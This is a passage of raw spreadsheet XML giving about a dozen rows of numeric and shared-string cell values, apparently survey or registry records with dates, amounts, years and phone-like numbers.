        <v>17638</v>
      </c>
      <c r="BB1134">
        <v>0</v>
      </c>
      <c r="BC1134">
        <v>0</v>
      </c>
      <c r="BD1134" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="1135" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1135">
        <v>5305</v>
      </c>
      <c r="B1135" t="s">
        <v>6415</v>
      </c>
      <c r="C1135" t="s">
        <v>3013</v>
      </c>
      <c r="D1135" t="s">
        <v>8536</v>
      </c>
      <c r="E1135" t="s">
        <v>843</v>
      </c>
      <c r="F1135" t="s">
        <v>8537</v>
      </c>
      <c r="G1135" s="1">
        <v>44225</v>
      </c>
      <c r="H1135">
        <v>8912</v>
      </c>
      <c r="I1135">
        <v>8912</v>
      </c>
      <c r="J1135">
        <v>0</v>
      </c>
      <c r="K1135">
        <v>0</v>
      </c>
      <c r="L1135">
        <v>0</v>
      </c>
      <c r="M1135">
        <v>0</v>
      </c>
      <c r="N1135">
        <v>0</v>
      </c>
      <c r="O1135">
        <v>0</v>
      </c>
      <c r="P1135">
        <v>0</v>
      </c>
      <c r="Q1135">
        <v>1</v>
      </c>
      <c r="R1135">
        <v>50</v>
      </c>
      <c r="S1135">
        <v>0</v>
      </c>
      <c r="T1135">
        <v>1</v>
      </c>
      <c r="U1135">
        <v>0</v>
      </c>
      <c r="V1135">
        <v>0</v>
      </c>
      <c r="W1135">
        <v>0</v>
      </c>
      <c r="X1135">
        <v>0</v>
      </c>
      <c r="Y1135">
        <v>0</v>
      </c>
      <c r="Z1135">
        <v>0</v>
      </c>
      <c r="AA1135">
        <v>0</v>
      </c>
      <c r="AB1135">
        <v>100</v>
      </c>
      <c r="AC1135">
        <v>5000</v>
      </c>
      <c r="AD1135">
        <v>0</v>
      </c>
      <c r="AE1135">
        <v>5000</v>
      </c>
      <c r="AF1135" t="s">
        <v>6418</v>
      </c>
      <c r="AG1135">
        <v>28914</v>
      </c>
      <c r="AH1135">
        <v>4</v>
      </c>
      <c r="AJ1135">
        <v>84</v>
      </c>
      <c r="AK1135" t="s">
        <v>3568</v>
      </c>
      <c r="AL1135" t="s">
        <v>3568</v>
      </c>
      <c r="AM1135" t="s">
        <v>8538</v>
      </c>
      <c r="AN1135" t="s">
        <v>55</v>
      </c>
      <c r="AO1135">
        <v>2016</v>
      </c>
      <c r="AP1135">
        <v>8127593580</v>
      </c>
      <c r="AQ1135" t="s">
        <v>6422</v>
      </c>
      <c r="AR1135" t="s">
        <v>6418</v>
      </c>
      <c r="AS1135" t="s">
        <v>71</v>
      </c>
      <c r="AT1135" t="s">
        <v>58</v>
      </c>
      <c r="AU1135">
        <v>14</v>
      </c>
      <c r="AV1135">
        <v>0</v>
      </c>
      <c r="AW1135">
        <v>0</v>
      </c>
      <c r="AX1135">
        <v>0</v>
      </c>
      <c r="AY1135">
        <v>6</v>
      </c>
      <c r="AZ1135">
        <v>1</v>
      </c>
      <c r="BA1135" t="s">
        <v>17129</v>
      </c>
      <c r="BB1135" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1135">
        <v>0</v>
      </c>
      <c r="BD1135" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1136" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1136">
        <v>5304</v>
      </c>
      <c r="B1136" t="s">
        <v>8539</v>
      </c>
      <c r="C1136" t="s">
        <v>99</v>
      </c>
      <c r="D1136" t="s">
        <v>8540</v>
      </c>
      <c r="E1136" t="s">
        <v>412</v>
      </c>
      <c r="F1136" t="s">
        <v>8541</v>
      </c>
      <c r="G1136" s="1">
        <v>44265</v>
      </c>
      <c r="H1136">
        <v>8940</v>
      </c>
      <c r="I1136">
        <v>8940</v>
      </c>
      <c r="J1136">
        <v>2</v>
      </c>
      <c r="K1136">
        <v>0</v>
      </c>
      <c r="L1136">
        <v>1</v>
      </c>
      <c r="M1136">
        <v>2</v>
      </c>
      <c r="N1136">
        <v>0</v>
      </c>
      <c r="O1136">
        <v>0</v>
      </c>
      <c r="P1136">
        <v>0</v>
      </c>
      <c r="Q1136">
        <v>0</v>
      </c>
      <c r="R1136">
        <v>0</v>
      </c>
      <c r="S1136">
        <v>0</v>
      </c>
      <c r="T1136">
        <v>0</v>
      </c>
      <c r="U1136">
        <v>1200000</v>
      </c>
      <c r="V1136">
        <v>0</v>
      </c>
      <c r="W1136">
        <v>7000</v>
      </c>
      <c r="X1136">
        <v>1000</v>
      </c>
      <c r="Y1136">
        <v>0</v>
      </c>
      <c r="Z1136">
        <v>0</v>
      </c>
      <c r="AA1136">
        <v>0</v>
      </c>
      <c r="AB1136">
        <v>0</v>
      </c>
      <c r="AC1136">
        <v>0</v>
      </c>
      <c r="AD1136">
        <v>0</v>
      </c>
      <c r="AE1136">
        <v>0</v>
      </c>
      <c r="AF1136" t="s">
        <v>8542</v>
      </c>
      <c r="AG1136">
        <v>14450</v>
      </c>
      <c r="AH1136">
        <v>12</v>
      </c>
      <c r="AJ1136">
        <v>160</v>
      </c>
      <c r="AK1136" t="s">
        <v>114</v>
      </c>
      <c r="AL1136" t="s">
        <v>115</v>
      </c>
      <c r="AM1136" t="s">
        <v>8543</v>
      </c>
      <c r="AN1136" t="s">
        <v>55</v>
      </c>
      <c r="AO1136">
        <v>2020</v>
      </c>
      <c r="AP1136" t="s">
        <v>8544</v>
      </c>
      <c r="AQ1136">
        <v>85607436201</v>
      </c>
      <c r="AR1136" t="s">
        <v>8545</v>
      </c>
      <c r="AS1136" t="s">
        <v>71</v>
      </c>
      <c r="AT1136" t="s">
        <v>58</v>
      </c>
      <c r="AU1136">
        <v>25</v>
      </c>
      <c r="AV1136">
        <v>1</v>
      </c>
      <c r="AW1136">
        <v>38</v>
      </c>
      <c r="AX1136">
        <v>15</v>
      </c>
      <c r="AY1136">
        <v>14</v>
      </c>
      <c r="AZ1136">
        <v>7</v>
      </c>
      <c r="BA1136" t="s">
        <v>17661</v>
      </c>
      <c r="BB1136" t="s">
        <v>16131</v>
      </c>
      <c r="BC1136" t="s">
        <v>9550</v>
      </c>
      <c r="BD1136" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="1137" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1137">
        <v>5309</v>
      </c>
      <c r="B1137" t="s">
        <v>8546</v>
      </c>
      <c r="C1137" t="s">
        <v>2308</v>
      </c>
      <c r="D1137" t="s">
        <v>8547</v>
      </c>
      <c r="E1137" t="s">
        <v>142</v>
      </c>
      <c r="F1137" t="s">
        <v>8548</v>
      </c>
      <c r="G1137" s="1">
        <v>44281</v>
      </c>
      <c r="H1137">
        <v>8948</v>
      </c>
      <c r="I1137">
        <v>8948</v>
      </c>
      <c r="J1137">
        <v>2</v>
      </c>
      <c r="K1137">
        <v>0</v>
      </c>
      <c r="L1137">
        <v>2</v>
      </c>
      <c r="M1137">
        <v>2</v>
      </c>
      <c r="N1137">
        <v>0</v>
      </c>
      <c r="O1137">
        <v>0</v>
      </c>
      <c r="P1137">
        <v>0</v>
      </c>
      <c r="Q1137">
        <v>10</v>
      </c>
      <c r="R1137">
        <v>5</v>
      </c>
      <c r="S1137">
        <v>0</v>
      </c>
      <c r="T1137">
        <v>1</v>
      </c>
      <c r="U1137">
        <v>200000</v>
      </c>
      <c r="V1137">
        <v>0</v>
      </c>
      <c r="W1137">
        <v>30000</v>
      </c>
      <c r="X1137">
        <v>1000</v>
      </c>
      <c r="Y1137">
        <v>0</v>
      </c>
      <c r="Z1137">
        <v>0</v>
      </c>
      <c r="AA1137">
        <v>0</v>
      </c>
      <c r="AB1137">
        <v>5000</v>
      </c>
      <c r="AC1137">
        <v>2000</v>
      </c>
      <c r="AD1137">
        <v>0</v>
      </c>
      <c r="AE1137">
        <v>5000</v>
      </c>
      <c r="AF1137" t="s">
        <v>8549</v>
      </c>
      <c r="AG1137">
        <v>98415</v>
      </c>
      <c r="AH1137">
        <v>33</v>
      </c>
      <c r="AJ1137">
        <v>485</v>
      </c>
      <c r="AK1137" t="s">
        <v>2313</v>
      </c>
      <c r="AL1137" t="s">
        <v>2314</v>
      </c>
      <c r="AM1137" t="s">
        <v>8550</v>
      </c>
      <c r="AN1137" t="s">
        <v>55</v>
      </c>
      <c r="AO1137">
        <v>2000</v>
      </c>
      <c r="AP1137">
        <v>811499118</v>
      </c>
      <c r="AQ1137" t="s">
        <v>8551</v>
      </c>
      <c r="AR1137" t="s">
        <v>8552</v>
      </c>
      <c r="AS1137" t="s">
        <v>71</v>
      </c>
      <c r="AT1137" t="s">
        <v>58</v>
      </c>
      <c r="AU1137">
        <v>20</v>
      </c>
      <c r="AV1137">
        <v>1</v>
      </c>
      <c r="AW1137">
        <v>3</v>
      </c>
      <c r="AX1137">
        <v>3</v>
      </c>
      <c r="AY1137">
        <v>6</v>
      </c>
      <c r="AZ1137">
        <v>4</v>
      </c>
      <c r="BA1137" t="s">
        <v>17664</v>
      </c>
      <c r="BB1137" t="s">
        <v>17666</v>
      </c>
      <c r="BC1137" t="s">
        <v>9550</v>
      </c>
      <c r="BD1137" t="s">
        <v>13154</v>
      </c>
    </row>
    <row r="1138" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1138">
        <v>5168</v>
      </c>
      <c r="B1138" t="s">
        <v>8553</v>
      </c>
      <c r="C1138" t="s">
        <v>477</v>
      </c>
      <c r="D1138" t="s">
        <v>8554</v>
      </c>
      <c r="E1138" t="s">
        <v>363</v>
      </c>
      <c r="F1138" t="s">
        <v>364</v>
      </c>
      <c r="G1138" s="1">
        <v>44251</v>
      </c>
      <c r="H1138">
        <v>8966</v>
      </c>
      <c r="I1138">
        <v>8966</v>
      </c>
      <c r="J1138">
        <v>0</v>
      </c>
      <c r="K1138">
        <v>0</v>
      </c>
      <c r="L1138">
        <v>0</v>
      </c>
      <c r="M1138">
        <v>0</v>
      </c>
      <c r="N1138">
        <v>0</v>
      </c>
      <c r="O1138">
        <v>0</v>
      </c>
      <c r="P1138">
        <v>0</v>
      </c>
      <c r="Q1138">
        <v>0</v>
      </c>
      <c r="R1138">
        <v>0</v>
      </c>
      <c r="S1138">
        <v>0</v>
      </c>
      <c r="T1138">
        <v>1</v>
      </c>
      <c r="U1138">
        <v>0</v>
      </c>
      <c r="V1138">
        <v>0</v>
      </c>
      <c r="W1138">
        <v>0</v>
      </c>
      <c r="X1138">
        <v>0</v>
      </c>
      <c r="Y1138">
        <v>0</v>
      </c>
      <c r="Z1138">
        <v>0</v>
      </c>
      <c r="AA1138">
        <v>0</v>
      </c>
      <c r="AB1138">
        <v>0</v>
      </c>
      <c r="AC1138">
        <v>0</v>
      </c>
      <c r="AD1138">
        <v>0</v>
      </c>
      <c r="AE1138">
        <v>1000</v>
      </c>
      <c r="AF1138" t="s">
        <v>8555</v>
      </c>
      <c r="AG1138">
        <v>94116</v>
      </c>
      <c r="AH1138">
        <v>29</v>
      </c>
      <c r="AJ1138">
        <v>376</v>
      </c>
      <c r="AK1138" t="s">
        <v>8556</v>
      </c>
      <c r="AL1138" t="s">
        <v>8557</v>
      </c>
      <c r="AM1138" t="s">
        <v>8558</v>
      </c>
      <c r="AN1138" t="s">
        <v>55</v>
      </c>
      <c r="AO1138">
        <v>2020</v>
      </c>
      <c r="AP1138">
        <v>85340563006</v>
      </c>
      <c r="AQ1138">
        <v>81245764990</v>
      </c>
      <c r="AR1138" t="s">
        <v>8559</v>
      </c>
      <c r="AS1138" t="s">
        <v>371</v>
      </c>
      <c r="AT1138" t="s">
        <v>58</v>
      </c>
      <c r="AU1138">
        <v>5</v>
      </c>
      <c r="AV1138">
        <v>0</v>
      </c>
      <c r="AW1138">
        <v>8</v>
      </c>
      <c r="AX1138">
        <v>0</v>
      </c>
      <c r="AY1138">
        <v>1</v>
      </c>
      <c r="AZ1138">
        <v>2</v>
      </c>
      <c r="BA1138" t="s">
        <v>17611</v>
      </c>
      <c r="BB1138">
        <v>0</v>
      </c>
      <c r="BC1138">
        <v>0</v>
      </c>
      <c r="BD1138" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1139" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1139">
        <v>5306</v>
      </c>
      <c r="B1139" t="s">
        <v>8560</v>
      </c>
      <c r="C1139" t="s">
        <v>74</v>
      </c>
      <c r="D1139" t="s">
        <v>8561</v>
      </c>
      <c r="E1139" t="s">
        <v>363</v>
      </c>
      <c r="F1139" t="s">
        <v>8562</v>
      </c>
      <c r="G1139" s="1">
        <v>44263</v>
      </c>
      <c r="H1139">
        <v>8974</v>
      </c>
      <c r="I1139">
        <v>8974</v>
      </c>
      <c r="J1139">
        <v>0</v>
      </c>
      <c r="K1139">
        <v>0</v>
      </c>
      <c r="L1139">
        <v>0</v>
      </c>
      <c r="M1139">
        <v>0</v>
      </c>
      <c r="N1139">
        <v>0</v>
      </c>
      <c r="O1139">
        <v>0</v>
      </c>
      <c r="P1139">
        <v>0</v>
      </c>
      <c r="Q1139">
        <v>12</v>
      </c>
      <c r="R1139">
        <v>8</v>
      </c>
      <c r="S1139">
        <v>0</v>
      </c>
      <c r="T1139">
        <v>1</v>
      </c>
      <c r="U1139">
        <v>0</v>
      </c>
      <c r="V1139">
        <v>0</v>
      </c>
      <c r="W1139">
        <v>0</v>
      </c>
      <c r="X1139">
        <v>0</v>
      </c>
      <c r="Y1139">
        <v>0</v>
      </c>
      <c r="Z1139">
        <v>0</v>
      </c>
      <c r="AA1139">
        <v>0</v>
      </c>
      <c r="AB1139">
        <v>80</v>
      </c>
      <c r="AC1139">
        <v>100</v>
      </c>
      <c r="AD1139">
        <v>0</v>
      </c>
      <c r="AE1139">
        <v>500</v>
      </c>
      <c r="AF1139" t="s">
        <v>8563</v>
      </c>
      <c r="AG1139">
        <v>53232</v>
      </c>
      <c r="AH1139">
        <v>14</v>
      </c>
      <c r="AJ1139">
        <v>188</v>
      </c>
      <c r="AK1139" t="s">
        <v>8564</v>
      </c>
      <c r="AL1139" t="s">
        <v>8565</v>
      </c>
      <c r="AM1139" t="s">
        <v>8566</v>
      </c>
      <c r="AN1139" t="s">
        <v>55</v>
      </c>
      <c r="AO1139">
        <v>2020</v>
      </c>
      <c r="AP1139" t="s">
        <v>8567</v>
      </c>
      <c r="AQ1139" t="s">
        <v>8568</v>
      </c>
      <c r="AR1139" t="s">
        <v>8563</v>
      </c>
      <c r="AS1139" t="s">
        <v>71</v>
      </c>
      <c r="AT1139" t="s">
        <v>58</v>
      </c>
      <c r="AU1139">
        <v>25</v>
      </c>
      <c r="AV1139">
        <v>0</v>
      </c>
      <c r="AW1139">
        <v>16</v>
      </c>
      <c r="AX1139">
        <v>31</v>
      </c>
      <c r="AY1139">
        <v>23</v>
      </c>
      <c r="AZ1139">
        <v>34</v>
      </c>
      <c r="BA1139" t="s">
        <v>17662</v>
      </c>
      <c r="BB1139" t="s">
        <v>16133</v>
      </c>
      <c r="BC1139">
        <v>0</v>
      </c>
      <c r="BD1139" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="1140" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1140">
        <v>5307</v>
      </c>
      <c r="B1140" t="s">
        <v>2417</v>
      </c>
      <c r="C1140" t="s">
        <v>129</v>
      </c>
      <c r="D1140" t="s">
        <v>8569</v>
      </c>
      <c r="E1140" t="s">
        <v>944</v>
      </c>
      <c r="F1140" t="s">
        <v>385</v>
      </c>
      <c r="G1140" s="1">
        <v>44284</v>
      </c>
      <c r="H1140">
        <v>8989</v>
      </c>
      <c r="I1140">
        <v>8989</v>
      </c>
      <c r="J1140">
        <v>0</v>
      </c>
      <c r="K1140">
        <v>3</v>
      </c>
      <c r="L1140">
        <v>0</v>
      </c>
      <c r="M1140">
        <v>0</v>
      </c>
      <c r="N1140">
        <v>0</v>
      </c>
      <c r="O1140">
        <v>0</v>
      </c>
      <c r="P1140">
        <v>1</v>
      </c>
      <c r="Q1140">
        <v>5</v>
      </c>
      <c r="R1140">
        <v>0</v>
      </c>
      <c r="S1140">
        <v>0</v>
      </c>
      <c r="T1140">
        <v>0</v>
      </c>
      <c r="U1140">
        <v>0</v>
      </c>
      <c r="V1140">
        <v>50000</v>
      </c>
      <c r="W1140">
        <v>0</v>
      </c>
      <c r="X1140">
        <v>0</v>
      </c>
      <c r="Y1140">
        <v>0</v>
      </c>
      <c r="Z1140">
        <v>0</v>
      </c>
      <c r="AA1140">
        <v>1000</v>
      </c>
      <c r="AB1140">
        <v>500</v>
      </c>
      <c r="AC1140">
        <v>0</v>
      </c>
      <c r="AD1140">
        <v>0</v>
      </c>
      <c r="AE1140">
        <v>0</v>
      </c>
      <c r="AF1140" t="s">
        <v>8570</v>
      </c>
      <c r="AG1140">
        <v>42186</v>
      </c>
      <c r="AH1140">
        <v>11</v>
      </c>
      <c r="AJ1140">
        <v>269</v>
      </c>
      <c r="AK1140" t="s">
        <v>3748</v>
      </c>
      <c r="AL1140" t="s">
        <v>8571</v>
      </c>
      <c r="AM1140" t="s">
        <v>8572</v>
      </c>
      <c r="AN1140" t="s">
        <v>55</v>
      </c>
      <c r="AO1140">
        <v>2010</v>
      </c>
      <c r="AP1140" t="s">
        <v>8573</v>
      </c>
      <c r="AQ1140" t="s">
        <v>8574</v>
      </c>
      <c r="AR1140" t="s">
        <v>8575</v>
      </c>
      <c r="AS1140" t="s">
        <v>71</v>
      </c>
      <c r="AT1140" t="s">
        <v>58</v>
      </c>
      <c r="AU1140">
        <v>6</v>
      </c>
      <c r="AV1140">
        <v>2</v>
      </c>
      <c r="AW1140">
        <v>15</v>
      </c>
      <c r="AX1140">
        <v>5</v>
      </c>
      <c r="AY1140">
        <v>8</v>
      </c>
      <c r="AZ1140">
        <v>20</v>
      </c>
      <c r="BA1140" t="s">
        <v>16644</v>
      </c>
      <c r="BB1140" t="s">
        <v>17663</v>
      </c>
      <c r="BC1140">
        <v>0</v>
      </c>
      <c r="BD1140" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="1141" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1141">
        <v>5301</v>
      </c>
      <c r="B1141" t="s">
        <v>8576</v>
      </c>
      <c r="C1141" t="s">
        <v>3013</v>
      </c>
      <c r="D1141" t="s">
        <v>8577</v>
      </c>
      <c r="E1141" t="s">
        <v>363</v>
      </c>
      <c r="F1141" t="s">
        <v>8578</v>
      </c>
      <c r="G1141" s="1">
        <v>44237</v>
      </c>
      <c r="H1141">
        <v>9087</v>
      </c>
      <c r="I1141">
        <v>9087</v>
      </c>
      <c r="J1141">
        <v>0</v>
      </c>
      <c r="K1141">
        <v>0</v>
      </c>
      <c r="L1141">
        <v>0</v>
      </c>
      <c r="M1141">
        <v>0</v>
      </c>
      <c r="N1141">
        <v>0</v>
      </c>
      <c r="O1141">
        <v>0</v>
      </c>
      <c r="P1141">
        <v>0</v>
      </c>
      <c r="Q1141">
        <v>0</v>
      </c>
      <c r="R1141">
        <v>0</v>
      </c>
      <c r="S1141">
        <v>0</v>
      </c>
      <c r="T1141">
        <v>1</v>
      </c>
      <c r="U1141">
        <v>0</v>
      </c>
      <c r="V1141">
        <v>0</v>
      </c>
      <c r="W1141">
        <v>0</v>
      </c>
      <c r="X1141">
        <v>0</v>
      </c>
      <c r="Y1141">
        <v>0</v>
      </c>
      <c r="Z1141">
        <v>0</v>
      </c>
      <c r="AA1141">
        <v>0</v>
      </c>
      <c r="AB1141">
        <v>0</v>
      </c>
      <c r="AC1141">
        <v>0</v>
      </c>
      <c r="AD1141">
        <v>0</v>
      </c>
      <c r="AE1141">
        <v>1000</v>
      </c>
      <c r="AF1141" t="s">
        <v>8579</v>
      </c>
      <c r="AG1141">
        <v>29271</v>
      </c>
      <c r="AH1141">
        <v>4</v>
      </c>
      <c r="AJ1141">
        <v>78</v>
      </c>
      <c r="AK1141" t="s">
        <v>8580</v>
      </c>
      <c r="AL1141" t="s">
        <v>8581</v>
      </c>
      <c r="AM1141" t="s">
        <v>8582</v>
      </c>
      <c r="AN1141" t="s">
        <v>68</v>
      </c>
      <c r="AO1141">
        <v>2014</v>
      </c>
      <c r="AP1141">
        <v>85384885333</v>
      </c>
      <c r="AQ1141" t="s">
        <v>8583</v>
      </c>
      <c r="AR1141" t="s">
        <v>8579</v>
      </c>
      <c r="AS1141" t="s">
        <v>71</v>
      </c>
      <c r="AT1141" t="s">
        <v>72</v>
      </c>
      <c r="AU1141">
        <v>12</v>
      </c>
      <c r="AV1141">
        <v>0</v>
      </c>
      <c r="AW1141">
        <v>7</v>
      </c>
      <c r="AX1141">
        <v>2</v>
      </c>
      <c r="AY1141">
        <v>0</v>
      </c>
      <c r="AZ1141">
        <v>0</v>
      </c>
      <c r="BA1141" t="s">
        <v>17659</v>
      </c>
      <c r="BB1141" t="s">
        <v>16132</v>
      </c>
      <c r="BC1141" t="s">
        <v>13186</v>
      </c>
      <c r="BD1141">
        <v>0</v>
      </c>
    </row>
    <row r="1142" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1142">
        <v>5182</v>
      </c>
      <c r="B1142" t="s">
        <v>8584</v>
      </c>
      <c r="C1142" t="s">
        <v>74</v>
      </c>
      <c r="D1142" t="s">
        <v>8585</v>
      </c>
      <c r="E1142" t="s">
        <v>49</v>
      </c>
      <c r="F1142" t="s">
        <v>5647</v>
      </c>
      <c r="G1142" s="1">
        <v>44315</v>
      </c>
      <c r="H1142">
        <v>9095</v>
      </c>
      <c r="I1142">
        <v>9095</v>
      </c>
      <c r="J1142">
        <v>1</v>
      </c>
      <c r="K1142">
        <v>0</v>
      </c>
      <c r="L1142">
        <v>0</v>
      </c>
      <c r="M1142">
        <v>0</v>
      </c>
      <c r="N1142">
        <v>0</v>
      </c>
      <c r="O1142">
        <v>0</v>
      </c>
      <c r="P1142">
        <v>0</v>
      </c>
      <c r="Q1142">
        <v>0</v>
      </c>
      <c r="R1142">
        <v>0</v>
      </c>
      <c r="S1142">
        <v>0</v>
      </c>
      <c r="T1142">
        <v>1</v>
      </c>
      <c r="U1142">
        <v>300</v>
      </c>
      <c r="V1142">
        <v>0</v>
      </c>
      <c r="W1142">
        <v>0</v>
      </c>
      <c r="X1142">
        <v>0</v>
      </c>
      <c r="Y1142">
        <v>0</v>
      </c>
      <c r="Z1142">
        <v>0</v>
      </c>
      <c r="AA1142">
        <v>0</v>
      </c>
      <c r="AB1142">
        <v>0</v>
      </c>
      <c r="AC1142">
        <v>0</v>
      </c>
      <c r="AD1142">
        <v>0</v>
      </c>
      <c r="AE1142">
        <v>300</v>
      </c>
      <c r="AF1142" t="s">
        <v>8586</v>
      </c>
      <c r="AG1142">
        <v>50244</v>
      </c>
      <c r="AH1142">
        <v>14</v>
      </c>
      <c r="AJ1142">
        <v>220</v>
      </c>
      <c r="AK1142" t="s">
        <v>8587</v>
      </c>
      <c r="AL1142" t="s">
        <v>3344</v>
      </c>
      <c r="AM1142" t="s">
        <v>8588</v>
      </c>
      <c r="AN1142" t="s">
        <v>82</v>
      </c>
      <c r="AO1142">
        <v>1981</v>
      </c>
      <c r="AP1142" t="s">
        <v>8589</v>
      </c>
      <c r="AQ1142" t="s">
        <v>8590</v>
      </c>
      <c r="AR1142" t="s">
        <v>8586</v>
      </c>
      <c r="AS1142" t="s">
        <v>71</v>
      </c>
      <c r="AT1142" t="s">
        <v>86</v>
      </c>
      <c r="AU1142">
        <v>6</v>
      </c>
      <c r="AV1142">
        <v>1</v>
      </c>
      <c r="AW1142">
        <v>0</v>
      </c>
      <c r="AX1142">
        <v>0</v>
      </c>
      <c r="AY1142">
        <v>0</v>
      </c>
      <c r="AZ1142">
        <v>5</v>
      </c>
      <c r="BA1142" t="s">
        <v>16848</v>
      </c>
      <c r="BB1142" t="s">
        <v>16111</v>
      </c>
      <c r="BC1142" t="s">
        <v>9477</v>
      </c>
      <c r="BD1142">
        <v>0</v>
      </c>
    </row>
    <row r="1143" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1143">
        <v>5325</v>
      </c>
      <c r="B1143" t="s">
        <v>8591</v>
      </c>
      <c r="C1143" t="s">
        <v>157</v>
      </c>
      <c r="D1143" t="s">
        <v>6298</v>
      </c>
      <c r="E1143" t="s">
        <v>142</v>
      </c>
      <c r="F1143" t="s">
        <v>8592</v>
      </c>
      <c r="G1143" s="1">
        <v>44294</v>
      </c>
      <c r="H1143">
        <v>9117</v>
      </c>
      <c r="I1143">
        <v>9117</v>
      </c>
      <c r="J1143">
        <v>1</v>
      </c>
      <c r="K1143">
        <v>0</v>
      </c>
      <c r="L1143">
        <v>1</v>
      </c>
      <c r="M1143">
        <v>0</v>
      </c>
      <c r="N1143">
        <v>0</v>
      </c>
      <c r="O1143">
        <v>0</v>
      </c>
      <c r="P1143">
        <v>0</v>
      </c>
      <c r="Q1143">
        <v>0</v>
      </c>
      <c r="R1143">
        <v>0</v>
      </c>
      <c r="S1143">
        <v>0</v>
      </c>
      <c r="T1143">
        <v>0</v>
      </c>
      <c r="U1143">
        <v>200000</v>
      </c>
      <c r="V1143">
        <v>0</v>
      </c>
      <c r="W1143">
        <v>5000</v>
      </c>
      <c r="X1143">
        <v>0</v>
      </c>
      <c r="Y1143">
        <v>0</v>
      </c>
      <c r="Z1143">
        <v>0</v>
      </c>
      <c r="AA1143">
        <v>0</v>
      </c>
      <c r="AB1143">
        <v>0</v>
      </c>
      <c r="AC1143">
        <v>0</v>
      </c>
      <c r="AD1143">
        <v>0</v>
      </c>
      <c r="AE1143">
        <v>0</v>
      </c>
      <c r="AF1143" t="s">
        <v>8593</v>
      </c>
      <c r="AG1143">
        <v>68472</v>
      </c>
      <c r="AH1143">
        <v>16</v>
      </c>
      <c r="AJ1143">
        <v>237</v>
      </c>
      <c r="AK1143" t="s">
        <v>377</v>
      </c>
      <c r="AL1143" t="s">
        <v>378</v>
      </c>
      <c r="AM1143" t="s">
        <v>8594</v>
      </c>
      <c r="AN1143" t="s">
        <v>68</v>
      </c>
      <c r="AO1143">
        <v>2014</v>
      </c>
      <c r="AP1143">
        <v>81331731444</v>
      </c>
      <c r="AQ1143" t="s">
        <v>8595</v>
      </c>
      <c r="AR1143" t="s">
        <v>8593</v>
      </c>
      <c r="AS1143" t="s">
        <v>179</v>
      </c>
      <c r="AT1143" t="s">
        <v>72</v>
      </c>
      <c r="AU1143">
        <v>24</v>
      </c>
      <c r="AV1143">
        <v>0</v>
      </c>
      <c r="AW1143">
        <v>6</v>
      </c>
      <c r="AX1143">
        <v>0</v>
      </c>
      <c r="AY1143">
        <v>4</v>
      </c>
      <c r="AZ1143">
        <v>6</v>
      </c>
      <c r="BA1143" t="s">
        <v>16938</v>
      </c>
      <c r="BB1143" t="s">
        <v>16136</v>
      </c>
      <c r="BC1143" t="s">
        <v>13188</v>
      </c>
      <c r="BD1143">
        <v>0</v>
      </c>
    </row>
    <row r="1144" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1144">
        <v>5293</v>
      </c>
      <c r="B1144" t="s">
        <v>8596</v>
      </c>
      <c r="C1144" t="s">
        <v>74</v>
      </c>
      <c r="D1144" t="s">
        <v>8597</v>
      </c>
      <c r="E1144" t="s">
        <v>142</v>
      </c>
      <c r="F1144" t="s">
        <v>2519</v>
      </c>
      <c r="G1144" s="1">
        <v>44258</v>
      </c>
      <c r="H1144">
        <v>9124</v>
      </c>
      <c r="I1144">
        <v>9124</v>
      </c>
      <c r="J1144">
        <v>1</v>
      </c>
      <c r="K1144">
        <v>3</v>
      </c>
      <c r="L1144">
        <v>1</v>
      </c>
      <c r="M1144">
        <v>0</v>
      </c>
      <c r="N1144">
        <v>0</v>
      </c>
      <c r="O1144">
        <v>0</v>
      </c>
      <c r="P1144">
        <v>0</v>
      </c>
      <c r="Q1144">
        <v>10</v>
      </c>
      <c r="R1144">
        <v>2</v>
      </c>
      <c r="S1144">
        <v>1</v>
      </c>
      <c r="T1144">
        <v>1</v>
      </c>
      <c r="U1144">
        <v>5000</v>
      </c>
      <c r="V1144">
        <v>300000</v>
      </c>
      <c r="W1144">
        <v>5000</v>
      </c>
      <c r="X1144">
        <v>0</v>
      </c>
      <c r="Y1144">
        <v>0</v>
      </c>
      <c r="Z1144">
        <v>0</v>
      </c>
      <c r="AA1144">
        <v>0</v>
      </c>
      <c r="AB1144">
        <v>3000</v>
      </c>
      <c r="AC1144">
        <v>2000</v>
      </c>
      <c r="AD1144">
        <v>1</v>
      </c>
      <c r="AE1144">
        <v>100000</v>
      </c>
      <c r="AF1144" t="s">
        <v>8598</v>
      </c>
      <c r="AG1144">
        <v>52182</v>
      </c>
      <c r="AH1144">
        <v>14</v>
      </c>
      <c r="AJ1144">
        <v>215</v>
      </c>
      <c r="AK1144" t="s">
        <v>8599</v>
      </c>
      <c r="AL1144" t="s">
        <v>8600</v>
      </c>
      <c r="AM1144" t="s">
        <v>8601</v>
      </c>
      <c r="AN1144" t="s">
        <v>55</v>
      </c>
      <c r="AO1144">
        <v>2016</v>
      </c>
      <c r="AP1144">
        <v>2834532020</v>
      </c>
      <c r="AQ1144" t="s">
        <v>8602</v>
      </c>
      <c r="AR1144" t="s">
        <v>8598</v>
      </c>
      <c r="AS1144" t="s">
        <v>71</v>
      </c>
      <c r="AT1144" t="s">
        <v>58</v>
      </c>
      <c r="AU1144">
        <v>26</v>
      </c>
      <c r="AV1144">
        <v>1</v>
      </c>
      <c r="AW1144">
        <v>20</v>
      </c>
      <c r="AX1144">
        <v>80</v>
      </c>
      <c r="AY1144">
        <v>14</v>
      </c>
      <c r="AZ1144">
        <v>2</v>
      </c>
      <c r="BA1144" t="s">
        <v>17653</v>
      </c>
      <c r="BB1144">
        <v>0</v>
      </c>
      <c r="BC1144" t="s">
        <v>13219</v>
      </c>
      <c r="BD1144">
        <v>0</v>
      </c>
    </row>
    <row r="1145" spans="1:56" x14ac:dyDescent="0.2">
